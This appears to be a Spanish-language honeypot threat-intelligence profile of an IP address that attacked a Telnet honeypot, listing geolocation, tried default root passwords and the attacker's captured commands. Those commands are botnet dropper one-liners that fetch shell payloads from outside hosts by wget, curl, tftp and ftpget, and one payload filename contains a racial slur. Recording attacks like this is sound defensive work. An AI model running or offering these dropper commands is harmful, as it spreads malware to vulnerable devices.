Amenaza Activa • MEDIO
176.65.139.16
🎯
31
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
3
Malware
Geolocalizacion
- Pais
- 🇸🇬 Singapur
- Ciudad
- Desconocida
- ASN
- AS16276
- ISP
- OVH SAS
Tipos de Ataque
cowrie
Puertos Atacados
23
Malware Asociado
Credenciales Intentadas
🔐root/root
2x🔐root/1234
1xComandos Ejecutados
$
uname -m3x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:8080/ez_nigger_xdd.sh || curl -O http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox wget http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox tftp 48.200.96.137 -c get ez_nigger_xdd.sh || busybox tftp -r ez_nigger_xdd.sh -g 48.200.96.137 -l ez_nigger_xdd.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 ez_nigger_xdd.sh ez_nigger_xdd.sh || tftp 48.200.96.137 -c get ez_nigger_xdd.sh || tftp -r 1x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:666/payload.sh || curl -O http://48.200.96.137:666/payload.sh || busybox wget http://48.200.96.137:666/payload.sh || busybox tftp 48.200.96.137 -c get payload.sh || busybox tftp -r payload.sh -g 48.200.96.137 -l payload.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 payload.sh payload.sh || tftp 48.200.96.137 -c get payload.sh || tftp -r payload.sh -g 48.200.96.137 -l payload.sh || ftpget -v -u1x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all1xEvaluacion de Riesgo
40
/100
BajoMedioAltoCritico